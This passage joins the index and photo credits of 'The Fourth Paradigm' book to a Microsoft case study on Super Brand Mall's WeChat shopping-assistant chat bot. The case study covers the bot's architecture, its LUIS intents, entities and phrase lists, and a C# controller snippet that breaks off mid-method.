See also information technology (IT) infrastructure cabled ocean observatory example, 3235 impact on ecological science, 2526 Jim Grays view, xx, xxi for knowledge-driven research, 165172 NSF efforts, xx, 198 scholarly communication requirements for, 198 as sociotechnical issue, 198199 Web-based, 197, 198 D Da Gama, Vasco, 57 DAGMan workflow system, 140 DAGs (directed acyclic graphs), 133 data. See also data-intensive science; databases; knowledge access and sharing policies within and among nations, 201208 analysis, xiv, xvii, xxiv capture, xiiixiv, xvii curation, xii, xiiixv, xvii, xxvii exponential increases in volume, 9, 3940, 77, 112, 117120, 131, 218 filtering, 6, 116, 162, 182, 194 as fourth network layer, 211, 213 interconnectedness, 219 need for systems that go from collecting to publishing on Web, xxiixxiii, xxix spatiotemporal, 84 data aggregation, 6263. See also cloud computing data clouds. See cloud computing data crawling, 8, 9 data deluge, as network concept, 210215. See also data-intensive science data exploration, 154157 data-intensive science. See also fourth paradigm database-centric computing, 511 description, xxx, 116, 224225 funding issues, xiii, xx, xxi, xxiv, xxv, 151, 198, 203, 206, 227228 Gordon Bells view, xixv impact of workflow tools, 137145 impact on scientific record, 177183 Jim Grays informal rules for approaching, 56, 7 need for semantic-based methodologies, 147153, 186189, 190 relationship to paradigm shift, 210 role of text, 185191 three basic activities, xiii two ways to engage scientific record, 182183 visualization for, 153163 data mining, 48, 121, 122, 123, 141, 190. See also text, tools for mining data parallelism, 127128. See also parallel computing data scientists, defined, xii. See also dataintensive science; scientific computing data sharing, 65, 6971, 128, 202204. See also collaboration data streaming, 84, 133, 154 data visualization. See visualization databases applying core functions of scholarly communication to datasets, 195 data-centric science overview, 511 Jim Grays definition, xxiii keeping scientific data and documents together, xivxv, xxviiixxix, 181, 182, 186188, 190, 219 limitations caused by dataset size, 57 scaling, 89, 6667 datasets. See databases dbMotion, 62 developing countries, healthcare delivery in, 6573 digital cameras, 18, 43 Digital Curation Centre, xv digital data libraries. See also archiving; curation description, xxx, 224225 Digital Libraries Initiative, 198 Jim Grays view, xxx linking documents to data, xxviiixxix, 181, 182, 186188, 190, 219, 224226 NCAR as example, xiv role of data scientists, xii role of overlay journals, xxviixxviii Directive on the Re-use of Public Sector Information, 205 243 DISC (Data-Intensive Super Computing), 166 DNA Data Bank of Japan (DDBJ), 117 documents. See scientific papers domain scientists exploring visual and analytical challenges held in common between disciplines, 44 interoperable exchange of information, 171 need for collaboration and peer relationships with computer scientists, 78, 35, 4551, 150, 228 need for generic software tools, xx, xxi, xxivxxv and Wolfram|Alpha service, 167 drugs crowdsourcing quality assurance, 61 Web-enabled innovation, 218 Dryad, 133, 166, 171 DryadLINQ. See LINQ (Language Integrated Query) dye advection, 161 E Earth and environmental science. 
See also ocean science cabled ocean observatories, 3235 collaboration among domain scientists and computer scientists, 4551 developing into science of environmental applications, 1319 impact of data flood on ecological science, 2126 next-generation sensor networks, 4551 role of NCAR as digital data library, xiv Web services registries, 150 Earth Observing System Clearinghouse (ECHO), 150 Earth Observing System Data and Information System (EOSDIS), 112, 113, 115 EBI (European Bioinformatics Institute), 118123 ECHO (Earth Observing System Clearinghouse), 150 ecology. See also Earth and environmental science and cloud computing, 2425 computational vs. eco-informatics, xix defined, 21 large synthesis studies, 2126 semantic technologies in, 148, 189, 190 watershed example, 2223 Eigenfactor project, 226 electro-optic cables, role in ocean research, 31, 32 electron microscopy, 7779 electronic health records (EHRs), 9192, 93. See also medical records Eli Lilly, 218 ELIXIR project, 122123 EMBL (European Molecular Biology Laboratory), 118, 186 EMBL-Bank (European Molecular Biology Laboratory Nucleotide Sequence Database), 117119 Ensembl Web site, 120 Entrez search engine, xxixxxx, 138 environmental science. See Earth and environmental science; ecology; science of environmental applications EOSDIS (Earth Observing System Data and Information System), 112, 113, 115 eResearch defined, 165, 178 policy frameworks for international collaboration, 201208 eScience, defined, xviii, 147, 227, 235. See also data-intensive science ET (evapotranspiration), 15, 22, 23, 25 European Bioinformatics Institute (EBI), 118123 European Nucleotide Archive, 118119 European Union, 205 Excel spreadsheets, xviii, xxi, xxiv experimental science. See scientific computing expert scientists. See domain scientists F face recognition, 43, 71 FASTQ format, 120 FDA. See Food and Drug Administration (FDA) Fernicola, Pablo, 188 fiber optics. See cabled ocean observatories Finney, Kim, 204 first paradigm, xviii, 96, 223 floating-point computations, 180 flood control, 1415 244 INDEX Flow Charts scheme, 160 flow visualization, 159161 Fluxnet, 25 fMRI (functional magnetic resonance imaging), 76 Food and Drug Administration (FDA), 61 forecasting, very short-term, 4849 four-color theorem, 180 fourth paradigm. See also data-intensive science defined, 165, 166 healthcare information example, 96 impact on scientific record, 177183 Jim Grays view, xiii, xiv, xix, xxx, 165, 177, 210, 223, 227 ocean science example, 3031 relationship to fourth network layer, 211 Freebase service, 167 FreeBSD Unix, xxiv functional programming languages, 128129 funding, xiii, xx, xxi, xxiv, xxv, 151, 198, 203, 206, 227228 G Galaxy Zoo tool, 4041, 42 GenBank, xxix, xxx, 117, 190 gene sequencing, xiii, 7, 36, 137, 186, 203 genes, using Taverna workflow to search for, 138, 139 genomes, 92, 95, 102, 120121 Genomes Online Database (GOLD), 120 GEO (Group on Earth Observations), 202 geology. 
See Juan de Fuca Plate GEOSS (Global Earth Observation System of Systems) as clearinghouse for Web service registries, 150 data sharing principles, 202203 German Intercity Express (ICE) trains, 160 Gilbert, Wally, 190 Global Change Master Directory (GCMD), 150 GOLD (Genomes Online Database), 120 Google MapReduce tool, 133, 166 PageRank tool, 116, 218 search engine, xxvi, 216 Google Health, 62 Google Sky, 42 GPGPUs (general-purpose graphics processing units), 127, 134 GPUFLIC algorithm, 160, 161 graphics processing units (GPUs) in flow visualization research, 159160 general-purpose, 127, 134 Gray, Jim background, 235236 and fourth paradigm, xiii, xiv, xix, xxx, 165, 177, 210, 223, 227 Grays Laws, 510 impact on cabled ocean observatory, 35, 37 informal rules for approaching data-intensive science, 56, 78 January 11, 2007, speech to Computer Science and Telecommunications Board, xiii, xviixxxi, 227228 photos, xvi, 234 role in arXiv, 185 and scholarly communication, xxxxvii, 198 suggests areas for action by funding agencies, 227228 Group on Earth Observations (GEO), 202 H H1N1 pandemic, 117 Hadoop, 133, 166, 171 Hales, Thomas, 180 HDF (Hierarchical Data Format), xxiii health avatars, 9697 healthcare. See also medical knowledge; medical records data-intensive, unified modeling approach, 9197 delivery in developing countries, 6573 information paradigms, 96 semantic technologies in, 148 Healthcare Singularity, 59, 6163 HealthVault, 62, 63 HEWs (health extension workers), 68, 71 Hippocrates, 96 Hirudo (European medicinal leech), 8687, 8889 Hubble Space Telescope, 41 I IEEE (Institute of Electrical and Electronics Engineers), xxviii 245 IEEE floating-point standard, 180 imaging techniques. See also visualization in developing computational microscope for neurobiologists, 84, 85, 8688 role in ocean research, 3132 for tracking neuronal circuits in the brain, 7582 immunization, in developing countries, 65 information overload, in medicine, 58, 9293. See also data, exponential increases in volume information technology (IT) infrastructure. See also cyberinfrastructure; data-intensive science; scientific computing and eScience, xviii, 227 impact on science community, 114115 new tools for data-intensive era, 115116 present day, 113114 recent history, 112 InnoCentive, 218 INSDC (International Nucleotide Sequence Database Collaboration), 117 INSPIRE Directive, 205 intellectual property, xxvi. See also copyright interdisciplinary research, 2526, 44, 170 International Human Genome Sequencing Consortium, 203 Internet. See also World Wide Web and astronomical investigation, 4043 interconnectedness of computers, 215 public nature, 211212 and rapid dissemination of environmental information, 1819, 48 role in cabled ocean observatories, 30, 31, 34, 36 role in ecological synthesis studies, 23 unifying data with literature, xxvxxvii INTERNIST-1 expert system, 67 invertebrate nervous systems, 8587 Isenberg, David, 211 IT. See information technology (IT) infrastructure J JISC (Joint Information Systems Committee), xv journal articles. 
See scientific papers Juan de Fuca Plate, 33 K Kapoor, Ashish, 86, 87 Karman dataset, 161 KEGG (Kyoto Encyclopedia of Genes and Genomes), 138 Kepler, Johannes, xi Kepler Conjecture, 180 Kepler workflow system, 140 Keplers Laws, xviii Kuhn, Thomas, 209 Kurzweil, Ray, 59 L Laboratory Information Management Systems (LIMS), xxii, 227 LabVIEW, xxiv Lancaster, James, 57 Language Integrated Query (LINQ), 133 Large Hadron Collider (LHC), xiii, xx, xxi, 147 Large Synoptic Survey Telescope (LSST), 40 Lawrence Livermore National Laboratory (LLNL), 154 LEAD workflows, 141 libraries, serials crisis, 193. See also digital data libraries; scientific papers licensing, open, 212 life sciences. See also Earth and environmental science; ecology; medical knowledge; ocean science application of semantic enhancement that integrates data with text, 148, 189, 190 computational vs. bioinformatics, xix creating machine-actionable representations of knowledge in scholarly literature, 194 developing data infrastructure, 117123 Entrez search engine, xxixxxx exponential increases in volume of data, 77, 117120, 218 growth and complexity of available data sources, 9293, 121122, 137 visualization in process algebra models, 99105 Life Under Your Feet program, 23, 47 Lind, James, 57 LINQ (Language Integrated Query), 133 Linux, xxiv LONI Pipeline workflow system, 140 246 INDEX M machine learning, 56, 83, 84, 85, 86, 9495 macroscope, 224 mapping. See also SensorMap; visualization brain circuitry, 7677 and Ocean Observatory Initiative, 33 terrestrial laser scan for snow distribution in Swiss Alps, 47 MapReduce, 7, 8, 133, 166, 171 Marine Metadata Interoperability (MMI) project, 148 markup, 150, 170, 182, 183, 186, 188 mashups, xxx, 22, 170171 MATLAB, xxi, xxiv, 25 Maxwells equations, xviii Mayo Clinic Health Advisory, 6263 medical knowledge. See also healthcare accuracy and efficiency of diagnoses, 6768 data integrity issue, 71 exponential rate increase, 5859, 92 information overload, 58, 9293 NxOpinion platform, 66, 67 and patient data clouds, 6263 translation to medical practice, 5764, 92, 93, 224 medical records in data-intensive healthcare systems, 9293 electronic, 9192, 93 issues in developing countries, 6569, 7172 need for scalable systems, 6667 paradigms of healthcare information, 96 patient de-identification, 65, 67, 71, 72 patient identification, 71 medications. See drugs Medicity, 62 MEDSEEK, 62 MESUR project, 196 meteorology. See weather science microscopes, computational, 84, 8789. See also electron microscopy, macroscope Microsoft and aggregation of data, 166 Amalga system, 62, 63 Azure platform, 133 Bing, xxvi Conference Management Tool (CMT), xxviii, xxix Dryad, 133, 166, 171 DryadLINQ, 133 HealthVault, 62, 63 and MapReduce tool, 133 SenseWeb project, 48, 49 SQL Server, 25, 48 Trident Scientific Workflow Workbench, 141 Word, article authoring add-in, 188 WorldWide Telescope, 4143, 44 Millennium Development Goals, U.N., 66 MMI (Marine Metadata Interoperability) project, 148 mobile phones. 
See cell phones modeling language-based approaches for biological systems, 99105 for prediction of phenomena-based environmental data, 48 unified approach to data-intensive healthcare, 9197 Moderate Resolution Imaging Spectroradiometer (MODIS), 18 Moglen, Eben, 212213 Moores Law, 59, 126 mountains, surface variability, 45, 4647 MSR Computational Microscope, 87, 88 multicore processors, 126127, 128, 129 Murray, Christopher, 65 Murray-Rust, Peter, 194 myExperiment project, 142143, 168, 197 myGrid project, 168 N NASA (National Aeronautics and Space Administration) and coming flood of ecological data, 23 Earth Observing System Data and Information System, 112, 113, 115 Global Change Master Directory, 150 Moderate Resolution Imaging Spectroradiometer, 18 National Center for Atmospheric Research (NCAR), xii, xiv National Center for Biotechnology Information, xxx, 118 National Climatic Data Center, 22 National Ecological Observatory Network, 23 247 National Human Genome Research Institute, 120121 National Institutes of Health (NIH), xxv National Library of Medicine (NLM), xxv, xxvii, xxviii, xxx National Science Foundation (NSF), xii, xv, xx, xxi, 32, 111, 198 natural language processing, 167, 169, 170, 189 Nature Network, 217 NCAR (National Center for Atmospheric Research), xii, xiv NEPTUNE program, xxi, 29, 32, 34 nervous system, 8389. See also brain NetCDF (Network Common Data Form), xxiii network effects, 212, 216 networks, and data deluge, 210215. See also Internet neurobiologists, new tools for, 8389 neurons, brain, 7881. See also nervous system NeuroTrace, 81 Newtons Laws of Motion, xviii NIH (National Institutes of Health), xxv Nijmegen Medical Centre, The Netherlands, 141 NLM (National Library of Medicine), xxv, xxvii, xxviii, xxx North American Carbon Program, 25 nowcasting, 4849 Noyes, Henry, 58 NSF (National Science Foundation), xii, xv, xx, xxi, 32, 111, 198 nucleotide sequencing, 117120 Nurse, Paul, 99 NxOpinion Knowledge Manager (NxKM), 66, 67, 68, 70, 71 O OAI (Open Archives Initiative), 194, 198 observatories. See telescopes; virtual observatory efforts Ocean Observatory Initiative (OOI), 3234 ocean science, 2738, 148 OECD (Organisation for Economic Cooperation and Development), 206207 OMB (U.S. Office of Management and Budget), 204205 ontologies, defined, 148. See also semantics OOI (Ocean Observatory Initiative), 3234 Open Archives Initiative (OAI), 194, 198 Open Geospatial Consortium, 24 open source software, 133, 140, 156, 212 OpenCyc, 167 OpenURL, 194 OpenWetWare, 217 oreChem project, 170171 Oregon State University, 32 OReilly, Tim, 216 out-of-core computing, 154 overlay journals, xxviixxviii OWL (Web Ontology Language), 167, 169, 197 P PageRank, Google algorithm, 116, 218 Pan-STARRS project, xiii, 9, 40, 141 papers. See scientific papers paradigm shifts, 209210. See also science paradigms parallel computing background, 125126 exploiting at individual node level, 134 exploiting in cloud computing, 132133 and multicore computers, 126127 programming challenges, 126129 ParaView, 158159 PDF files, 188, 193 peer-review process compared with wikis, xxviiixxix future, xxviiixxix, 115 Jim Grays view, xvii, xxvixxix pros and cons, xxviii, 111, 179, 193 Pegasus workflow system, 140 petascale databases, 89, 119, 161 physical sciences, need for coordinated semantic enhancement effort, 148, 189, 190191 Pipeline Pilot workflow system, 140 plate tectonics. 
See Juan de Fuca Plate pneumonia, in developing countries, 66 policies, for accessing and sharing data within and among nations, 201208 powers of ten, 237 Powerset service, 167 probabilistic graphical models, 87, 94 probabilistic similarity networks, 67, 68 process calculi, 99 professional societies, xxviii, 151 Project NEPTUNE, xxi, 29, 32, 34 248 INDEX provenance, xii, xxix, 156, 157, 158, 197. See also citation data in scholarly communication PubChem, xxx, 217 public. See citizen science public health, 66, 69, 71. See also healthcare publications. See scientific papers PubMed Central, xxv, xxvi, xxvii, xxviii, xxx, 185, 186 R RDF (Resource Description Framework), 167, 197 reference data collections, 181182 Reflect tool, EMBL Germany, 186 registration, as core function in scholarly communication, 195 remote sensing. See sensors research, reexamining structures, 111116 rewarding, as core function in scholarly communication, 195 Robertson Research Institute, 66 robotics, role in ocean research, 31, 32 rofecoxib (Vioxx), 61 Royal Society of Chemistry, 186 RSS format, 197, 198 S San Diego Supercomputer Center (SDSC), xiv Sanger Institute, 118, 120121 satellites role in astronomical investigations, 42 role in ecological synthesis studies, 23, 24 role in environmental applications, 13, 17, 18, 46, 148149 role in ocean science, 28, 31, 32 scaling in medical records systems, 66, 67 as network capability, 211, 213 processing vs. data considerations, 143, 154 scanning electron microscope (SEM), 79. See also electron microscopy SCEC (Southern California Earthquake Center) CyberShake project, 140, 143 schema, xiii, xxiii, xxix scholarly communication. See also digital data libraries; scientific papers availability of Web for furthering scientific collaboration, 216217 citation data, 25, 151, 178, 186, 187, 195196, 226 core functions, 195 creating machine-actionable representations of knowledge in scientific literature, 194195 ever-growing scale of scientific record, 179180, 182 impact of data-intensive science on scientific record, 177183 Jim Grays view of coming revolution, xxvxxvii, 198 linking documents to data, xxviiixxix, 181, 182, 186188, 190, 219, 224226 long-term trends in scientific research, 217219 machine-friendly, 193199 need for collaboration and peer relationships between domain scientists and computer scientists, 78, 35, 4551, 150, 228 origin of division between experimental data and creation of theories, xi tracking evolution and dynamics of scholarly assets, 195197 School Health Annual Report Programme (SHARP), 69 science. See astronomy; data-intensive science; Earth and environmental science; ocean science science of environmental applications, 1319 science paradigms. See also fourth paradigm first, empirical, xviii, 96, 223 second, theoretical, xviii, 96, 223 third, computational, xviiixix, 96, 177, 180, 223 fourth, eScience, xviii, xix, 96, 223 in healthcare information, 96 Jim Grays view, xviiixix scientific communication. See scholarly communication scientific computing. See also cloud computing; data-intensive science communication between computer scientists and domain scientists, 78, 35, 4551, 150, 228 new tools for neurobiologists, 8389 and parallel processing, 125129 and plethora of data, 56, 8, 9, 131135 249 scientific computing, continued process algebra models of biological systems, 99105 scientific papers. See also archiving; digital data libraries changes in publishing practices, xxviii, 183 creating machine-actionable representations, 194195 digital model vs. 
electronic model, 181 exponential growth in number, 58, 92 instantaneous translation, 61 linking to data, xxviiixxix, 181, 182, 186188, 190, 219, 224226 semantic enhancement, 186190 serials crisis in libraries, 193 as tip of data iceberg, xvii vs. scientific data, xii, xxviixxx, 185 scientific record, 177183 scientists. See citizen science; domain scientists; scientific computing SciScope, 24 Scripps Institution of Oceanography, 32 scurvy, 5758 second paradigm, xviii, 96, 223 Sedna workflow system, 140 SEEK (Science Environment for Ecological Knowledge), 148 Semantic Computing, 169 Semantic Web, 151, 167, 170, 171, 198 semantics applying tools to eScience, 147152 enhancing text to include data links, 186190 and interoperability, 150151, 167, 168, 188, 197 SenseWeb project, 48, 49 SensorMap, 49 sensors role in ecological synthesis studies, 2325 role in environmental science, 4551, 148, 224 role in ocean research, 3133 SensorScope, 49 SETI@Home project, xxiv sharing data, 65, 6971, 128, 202, 203204. See also collaboration Shirky, Clay, 215 Short Read Archive, 118, 119 Shotton, D., 186 simulation comparison to fourth paradigm, 177, 180, 210 need for new data analysis techniques, 161162 process algebra models of biological systems, 99105 singularity, medical, 5564 sky browsers, 41 Sloan Digital Sky Survey (SDSS), xx, 4041 sneakernet, 166 snowmelt runoff, as example of relationships between basic science and applications, 1418 software tools, need for more in science disciplines, xx, xxi, xxivxxv. See also dataintensive science; scientific computing; workflows solar-terrestrial physics, 148, 149 SourceForge, 188 Southern California Earthquake Center (SCEC) CyberShake project, 140, 143 SQL Server, 25, 48 stationarity, 14, 16 Stefaner, Moritz, 226 Stoermer, Mark, 29, 36 Suber, Peter, xxv surface parameterization, 159160 Sustainable Digital Data Preservation and Access Network Partners (DataNet) program, 198 Swiss Alps, terrestrial laser scan for snow distribution, 46, 47 Swiss Experiment, 47, 4849 synthesis studies, ecology, 2126 Szalay, Alex, 235 T Taverna workflows, 138, 139, 140, 141 Taylor, John, 227 telescopes, 39, 40, 41. See also WorldWide Telescope (WWT) Teradata, 7 text. See also scientific papers role as type of data, 185191 semantic enhancement, 186190 tools for mining, 141, 182, 186, 189, 219 third paradigm, xviiixix, 96, 177, 180, 223 250 INDEX Trace/Trace Assembly Archive, 118, 119 transactional memory (TM), 128 Triana workflow system, 140 True Knowledge service, 167 U UFAC algorithm, 160 UniProt, 138 United Nations Millennium Development Goals, 66 University of California, San Diego, xiv, 32 URIs (uniform resource identifiers), 197 U.S. Geological Survey (USGS), 22, 23 U.S. Office of Management and Budget (OMB), 204205 USA National Phenology Network, 23 V Van Arkel, Hanny, 41 Vertica, 7 Very Large Array (VLA) radio telescope, 41 virtual observatory efforts, 43, 149 virtualization. See cloud computing VisTrails, 156, 157, 159 visual data analysis, 153163 visualization. 
See also imaging techniques common challenges across scientific fields, 4344 computational microscope for neurobiologists, 8389 needs and opportunities in data-intensive science, 153163 in process algebra models of biological systems, 99105 SensorMap example for displaying real-time and historical environmental factors, 49 in synthesis studies for ecological data, 26 ViSUS, 154155 VLA (Very Large Array) radio telescope, 41 von Neumann, John, 177 VSTO (Virtual Solar-Terrestrial Observatory), 149 W Wagenaar, Daniel, 86, 87 water systems. See snowmelt runoff, as example of relationships between basic science and applications WATERS Network, 23 Watson, Thomas, 215 weather science, 17, 46, 4849 Web 2.0, 216. See also World Wide Web Web Ontology Language (OWL), 167, 169, 197 Wellcome Trust, xxv, 118 Wikipedia, 212, 217 wikis, compared with peer review, xxviiixxix Wilbanks, John, 190 Wing, Jeannette, xx Wolfram|Alpha service, 167, 168, 189 Woods Hole Oceanographic Institution, 32 workflows as computer-enabled support activity for ocean science, 31 defined, 138 impact on data-centric research, 137145 and provenance, 156, 197 role in myGrid and myExperiment projects, 168 visually representing modifications, 157159 World Wide Web background, 134 as dominant computing platform, 216 impact on scientific research, 134, 166 and knowledge-driven research infrastructure, 167169 Web 2.0, 216217 WorldWide Telescope (WWT), 4, 4143, 44 XY X PRIZE for Genomics, xiii XML (eXtensible Markup Language), 122, 150, 186, 197 Yahoo!, 133, 166, 185 251 page x : Galileo calculates the magnification of his telescope. Mary Evans/Photo Researchers, Inc. Rights reserved. page x v i : page 222 : Two stars orbit one another in the core of the large emission nebula NGC 6357 in Scorpius, about 8,000 light-years from Earth. NASA, ESA, and Jess Maz Apellniz (Instituto de Astrofsica de Andaluca, Spain). Public domain. Jim Gray speaking at the Computing in the 21st Century conference in Beijing, October 2006. Microsoft Research. USGS/NASA image of the Bogda Mountains, China. U.S. Geological Survey. Public domain. page 2 : Visualization showing the citation links of the journal Nature. Image courtesy of Moritz Stefaner and Carl Bergstrom,. page 229 : Tony Hey, Kristin Tolle, and Stewart Tansley of Microsoft External Research. Vetala Hawkins/Microsoft Corporation. page 234 : Jim Gray on Tenacious, January 2006. Photo by Tony Hey. back cov er : Microsoft Tag from. Get the free app for your phone at and snap it! page 226 : page 54 : Colored magnetic resonance imaging (MRI) scan of a woman. Simon Fraser/Photo Researchers, Inc. Rights reserved. page 108 : A wafer containing the Intel Teraflops Research Chip. Intel Corporation. Rights reserved. page 174 : Central Library, Seattle (Rem Koolhaas, principal architect). Vetala Hawkins/Filmateria Digital. Rights reserved. not e : URLs can go offline for various reasons, either temporarily or permanently. Not all of the URLs in this book were still live at the time of publication, but we have successfully accessed such pages using various services such as Internet Archives Wayback Machine,. 252 The impact of Jim Grays thinking is continuing to get people to think in a new way about how data and software are redefining what it means to do science. Bill Gates I often tell people working in eScience that they arent in this field because they are visionaries or super-intelligentitsone
https://www.scribd.com/document/134036381/4th-Paradigm-Book-Complete
CC-MAIN-2019-35
en
refinedweb
freelocale - free resources allocated for a locale object

#include <locale.h>

void freelocale(locale_t locobj);

The freelocale() function causes the resources allocated for a locale object returned by a call to newlocale(3C) or duplocale(3C) to be released.

No errors are defined.

See attributes(7) for descriptions of the attributes of this interface.

See also: duplocale(3C), newlocale(3C), uselocale(3C), attributes(7), standards(7)
https://docs.oracle.com/cd/E88353_01/html/E37843/freelocale-3c.html
CC-MAIN-2019-35
en
refinedweb
ISSUE-82: Can RDFa attributes be namespaced? rdfa attribute namespace Can RDFa attributes be namespaced? - State: - CLOSED - Product: - LC Comment - RDFa Core 1.1 - Raised by: - Steven Pemberton - Opened on: - 2011-02-03 - Description: - During a discussion about RDFa Host Language Conformance, the question arose on whether or not RDFa attributes were allowed to be used in namespace-aware XML languages: The RDFa Working Group needs to decide if RDFa can be integrated into other languages in a namespaced fashion. It was suggested that this could be an optional feature of RDFa Processors after noting that making it a mandatory feature would complicate RDFa Processor implementations more than desired. - Related Actions Items: - No related actions - Related emails: - RDFa WG telecon minutes for 2011-03-24 (from msporny@digitalbazaar.com on 2011-03-24) - Re: RDFa Last Call responses (from Steven.Pemberton@cwi.nl on 2011-03-09) - RDFa Last Call responses (from msporny@digitalbazaar.com on 2011-03-08) - RDFa WG telecon minutes for 2011-02-14 (from msporny@digitalbazaar.com on 2011-02-14) - Re: URGENT: RDFa Super Session II: The Last Calling (from shane@aptest.com on 2011-02-14) - Re: URGENT: RDFa Super Session II: The Last Calling (from ivan@w3.org on 2011-02-14) - URGENT: RDFa Super Session II: The Last Calling (from msporny@digitalbazaar.com on 2011-02-14) - Re: Telecon Agenda - February 10th 2011, 1400 UTC (from benjamin.adrian@dfki.de on 2011-02-10) - Telecon Agenda - February 10th 2011, 1400 UTC (from msporny@digitalbazaar.com on 2011-02-07) - ISSUE-82: Can RDFa attributes be namespaced? (from sysbot+tracker@w3.org on 2011-02-03) Related notes: Note that XHTML Modularization says the following about XHTML attributes:. The spec has been updated to reflect the resolution from the 14 February meeting.Shane McCarron, 2 Mar 2011, 04:43:29 Display change log
http://www.w3.org/2010/02/rdfa/track/issues/82?changelog
CC-MAIN-2019-35
en
refinedweb
Building a chat bot shopping assistant for Super Brand Mall's WeChat Nowadays physical malls and stores are facing unprecedented competition from e-commerce. Providing a differentiated in-store experience, knowing their customers better, and increasing customer stickiness are the topmost challenges for mall operators. Super Brand Mall, one of the high-end luxury shopping malls in Shanghai, partnered with Microsoft and built a chat bot for its WeChat official account. As a result, Super Brand Mall customers could get information about mall services through a conversational experience, making the bot a key component for this retail giant in remolding its customer experience. Key technologies used - Microsoft Bot Framework - Language Understanding Intelligent Service (LUIS) - Microsoft Azure SQL Database Core team The team was comprised of members from Super Brand Mall’s IT department and Microsoft DX China: - Christina Cheng – Director, IT Core Applications, Super Brand Mall - Junkai Zhang – Supervisor, IT, Super Brand Mall - Biyan Huang – Manager, IT, Super Brand Mall - Warren Zhou – Senior Technical Evangelist, Microsoft China - Leon Liang – Senior Technical Evangelist, Microsoft China - Zepeng She – Technical Evangelist, Microsoft China Figure 1. The team on a conversation-as-a-platform hackfest in China Customer profile Super Brand Mall is an international style urban shopping center developed by Shanghai Kinghill Limited, the real estate subsidiary of the Charoen Pokphand Group (CP Group) of Thailand. Super Brand Mall has a combined gross floor area of 250,000 square meters, with 10 floors above ground and 3 floors underground. Super Brand Mall is one of the CP Group’s flagship projects in China. Located in the Lujiazui area of Pudong, the most important financial district of the city, Super Brand Mall lies in the heart of The Bund. The overall architecture design was by the famous architect firm Jerde Partnership. With five different building elevations, its design, along with colors, makes Super Brand Mall a grand sight within the already exceptional Lujiazui area. Based on the motto “all aged customers, all day shopping experience, one-place satisfaction,” Super Brand Mall strives to meet modern home entertainment and shopping needs to break the general large commercial building layout mode, with a whole new concept in indoor commercial pedestrian street patterns. The design allows for internal and external consumer traffic, thus adding towards the already outstanding layout of the total structure. Problem statement Even though Super Brand Mall is one of the prime shopping malls in Shanghai, it lacks an effective way to digitally interact with its customers. The mall operates an official account on WeChat, the primary social and messaging app in China, and has more than 260,000 subscribers. However, it remains a one-way marketing advertisement platform rather than a communication interface. The mall is looking for a way to distinguish active members from ordinary visitors and profile their activities, interests, and preferences. Currently the only places that provide in-mall guidance are via some touch-screen directories and information desks, which do not meet the needs of all the customers all the time. Some isolated systems provide mall services such as promotional information and coupons, membership and points, and parking and payment. Customers want a unified interface to access these services in a way they prefer. 
“Before starting this intelligent chat bot project, we do not have a comprehensive and accurate way to record our customers’ asks: what are their queries, suggestions or complaints; which brands and promotion coupons they are interested; which services in the mall they really use. Without precisely knowing and profiling our customers, we could never transform ourselves to a better mall they enjoy and love!” —Christina Cheng, Director, IT Core Applications, Super Brand Mall Solution and steps Super Brand Mall considers WeChat to be its most important channel for digital marketing and customer engagement, so the chat bot is expected to be a key part of its WeChat official account. The bot is hosted on Microsoft Azure services. Leveraging Microsoft’s intelligent services (LUIS), the bot would understand users’ natural language inputs in Chinese, make queries to some data systems if needed, and reply to users with the following capabilities: - Querying the location and promotion information for brands and stores in the mall - Recommending brands and stores for categories - Querying in-mall events - Checking and consuming membership points - Querying the location and price for the parking lot To meet the requirements for the Super Brand Mall’s chat bot, the following technologies were adopted: - The chat bot starts from the Bot Builder SDK for .NET. Its conversational logic is written in C#. During the project period, WeChat was not yet an officially supported channel, so the bot communicates with WeChat via Direct Line 3.0 REST APIs. - To understand users’ inputs in Chinese natural language, the Microsoft Cognitive Services Language Understanding Intelligent Service (LUIS) was used to extract their intents and variables. - The chat bot needs some data from the mall’s line-of-business (LOB) systems to provide assistance for in-mall events, promotional campaigns, and membership information. Rather than accessing those heterogeneous LOB data sources directly, the bot accesses the easy-to-manage Azure SQL Database to retrieve the necessary data. Periodic synchronization to the LOB databases ensures that the information from the bot is up to date. Architecture diagram Figure 2 shows the architecture of this chat bot project: The bot is implemented in C# and deployed as a web app using Azure App Service on Azure datacenters in China. Texts and clicks to hyperlinks are the only interactions supported in this version, so LUIS is the only Cognitive Services feature invoked at present. Speech recognition using the Bing Speech API is in the plan for later. Azure SQL Database is a periodically synchronized copy of part of the LOB databases and is read by the bot. Later it will also store user preferences and activities extracted from chat history. Figure 2. Architecture diagram Demo video Technical delivery Prerequisite steps The following resources are prerequisite steps for the development environment: - Install Visual Studio. - Install the Bot Builder SDK for .NET. - Obtain Cognitive Services keys for LUIS. - Create an Azure account. Bot design and configuration Because the chat bot interacts with users in the WeChat mobile app on iOS, Android, and Windows phones, the design of the chat bot basically follows the bots in native mobile app pattern. As mentioned earlier, communicating to the WeChat backend requires enabling the Direct Line channel for this bot. To get the full capability and best performance, ensure that all three version options on the Direct Line configuration page are checked. 
Figure 3. Direct Line configuration Language Understanding Intelligent Service (LUIS) Intents Before doing a deep-dive into the bot code, let’s have a quick glance at the LUIS app to see how it helps us understand users’ intents in a mall-assistant scenario. Of the 18 intents defined in the LUIS app, some are frequently asked and quite complex with many utterances, such as ProvideInfo (86 utterances), QueryMemberStore (44), and QueryLocation (41), while some are less popular and simpler with fewer utterances, such as QueryParkingLot (7), SayHello (4), and SeeMovie (3). Figure 4. All intents For example, for the QueryMemberStore intent, the training utterances cover not only sayings such as “Which stores are members?” but also sayings with some constraints such as Category, Product, and Floor. In the real world, querying member stores for men’s clothes or down jackets are common questions. Figure 5. The QueryMemberStore intent Entities Entities are the parameters in the utterances that the scenario cares about. In addition to prebuilt entities such as datetime or number, seven custom entities are defined in this LUIS app: - Category - Brand - Product - Facility - Landmark - Floor - Activity Figure 6. All entities Phrase lists After designing the intents and entities, the trained LUIS model did not provide satisfying accuracy for later tests. Deeper investigation showed it performed poorly when recognizing some specific entities such as brand, event, and landmark names or their abbreviations. So the phrase list feature was adopted in the LUIS app by providing all possible entity values related to this mall. The refined and retrained LUIS app performs much better after importing these phrase lists. The learning here is, if there are very specific and uncommon words for your entities, be sure to use the phrase list or other features. Figure 7. All phrase lists Bot code samples MessagesController Following is the code for MessagesController. If there’s a message from the Direct Line channel, it invokes the CRMDialog4WeChat with parameters of the user’s WeChat ID. Although WeChat is the only channel at present that the bot responds to, the code keeps the extensibility to support other channels in the future. public class MessagesController : ApiController { public virtual async Task<HttpResponseMessage> Post([FromBody] Activity activity) { if (activity.Type == ActivityTypes.Message) { try { //可以通过ChannelId判断是哪个渠道。不同渠道的返回值可能并不相同,区分之后可以分别回复。 